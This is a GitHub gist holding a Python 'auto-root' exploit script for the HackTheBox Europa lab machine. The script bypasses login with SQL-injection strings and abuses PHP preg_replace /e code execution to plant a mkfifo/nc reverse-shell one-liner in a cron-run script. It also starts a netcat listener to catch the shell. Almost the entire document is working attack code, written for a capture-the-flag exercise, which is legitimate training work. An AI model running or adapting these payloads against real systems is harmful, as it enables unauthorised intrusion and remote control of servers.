Created
June 11, 2023 21:02
-
-
Save dipa96/16fbbc204d8d7daac581ed52c421d363 to your computer and use it in GitHub Desktop.
Auto-Root Python script for HTB Europe box from HackTheBox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3.9 | |
| """ | |
| htb_europa.py | |
| Author: Donato Di Pasquale (dipa) | |
| Description: Auto-Root Python script for HTB Europe box from HackTheBox | |
| Tech Stack Info: Support python3.9 and below | |
| Usage: sudo python3 htb_xxx.py -t <target> -i <your ip> | |
| Box URL: https://app.hackthebox.com/machines/Europa | |
| Box writeup: https://0xdf.gitlab.io/2021/02/02/htb-europa.html | |
| """ | |
| import argparse | |
| import requests | |
| import time | |
| import colorama | |
| from colorama import Fore | |
| # Remove /usr/lib/python3/dist-packages/urllib3/connectionpool.py:1048: InsecureRequestWarning: Unverified HTTPS request is being made to host | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| import threading | |
| import subprocess | |
| # Setup for Debug | |
| proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} | |
| def parse_arguments(): | |
| parser = argparse.ArgumentParser(description="HackTheBox Bank Exploit, run this exploit as root") | |
| parser.add_argument("-t", "--target", type=str, help="") | |
| parser.add_argument("-i", "--ips", type=str, help="Your Host") | |
| args = parser.parse_args() | |
| return args | |
| # Check Web App, change this with echo ping request in future release | |
| def checkHost(args): | |
| print(Fore.YELLOW + "[DEBUG] Target entered: " + args.target + Fore.RESET) | |
| print(Fore.YELLOW + "[DEBUG] Send request to https://" + args.target + Fore.RESET) | |
| req = requests.get("https://" + args.target, timeout=5, verify=False) | |
| if req.status_code == 200: | |
| print(Fore.GREEN + "[OK] " + args.target + " Target status code 200 OK" + Fore.RESET) | |
| else: | |
| print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET) | |
| return 1 | |
| # Write DNS in /etc/hosts | |
| def writeEtcHosts(args): | |
| # Insert DNS HERE | |
| dns = "admin-portal.europacorp.htb" | |
| print(Fore.YELLOW + "[DEBUG] Try to setting up new dns record " + dns + " in /etc/hosts file" + Fore.RESET) | |
| try: | |
| hosts = open("/etc/hosts", "a") | |
| print(Fore.YELLOW + "[DEBUG] Writing " + dns + " in /etc/hosts file... Don't forget to manually DELETE them after script" + Fore.RESET) | |
| hosts.write(args.target + "\t" + dns + "\n") | |
| except Exception as e: | |
| print(Fore.RED + "[ERROR]", type(e).__name__) | |
| if type(e).__name__ == "PermissionError": | |
| print(Fore.RED + "[ERROR] Run this exploit as root!" + Fore.RESET) | |
| return 1 | |
| finally: | |
| print(Fore.GREEN + "[OK] " + dns + " successful added to /etc/hosts" + Fore.RESET) | |
| return dns | |
| def pwn(args, dns): | |
| def exploit(dns): | |
| # Session Object | |
| session = requests.Session() | |
| # Bypass Login and impersonate Administrator | |
| values_for_login = { | |
| "email":"admin@europacorp.htb' OR '1'='1", | |
| "password":"admin@europacorp.htb' OR '1'='1" | |
| } | |
| print(Fore.YELLOW + "[DEBUG] Bypass login loading " + Fore.RESET) | |
| login = session.post("https://" + dns + "/login.php", data=values_for_login, verify=False) | |
| # Dict for cookies | |
| cookies = {} | |
| # Formatting n+1 cookies | |
| for cookie in session.cookies: | |
| cookies[cookie.name] = cookie.value | |
| # eXploit preg_replace(), PHP Function | |
| print(Fore.YELLOW + "[DEBUG] eXploit preg_replace() and write reverse shell" + Fore.RESET) | |
| values_for_preg_replace = { | |
| "pattern":"/a/e", | |
| # "ipaddress":"system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 1337 >/tmp/f');", | |
| "ipaddress":"system('echo \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc " + args.ips + " 1337 >/tmp/f\" > /var/www/cmd/logcleared.sh; chmod +x /var/www/cmd/logcleared.sh');", | |
| "text":"preg_replace" | |
| } | |
| print(Fore.YELLOW + "[DEBUG] Send payload..." + Fore.RESET) | |
| print(Fore.YELLOW + "[DEBUG] Waiting for reverse shell..." + Fore.RESET) | |
| preg_replace = session.post("https://" + dns + "/tools.php", data=values_for_preg_replace, verify=False, proxies=proxies) | |
| def run_listener(): | |
| print(Fore.YELLOW + "[DEBUG] Setup listener on 0.0.0.0 1337, wait for connection..." + Fore.RESET) | |
| nc_command = "nc -lnp 1337" | |
| nc_process = subprocess.Popen(nc_command, shell=True) | |
| nc_process.wait() | |
| listener_thread = threading.Thread(target=run_listener) | |
| listener_thread.start() | |
| exploit(dns) | |
| def main(): | |
| args = parse_arguments() | |
| checkHost(args) | |
| dns = writeEtcHosts(args) | |
| # dns = "admin-portal.europacorp.htb" | |
| pwn(args, dns) | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment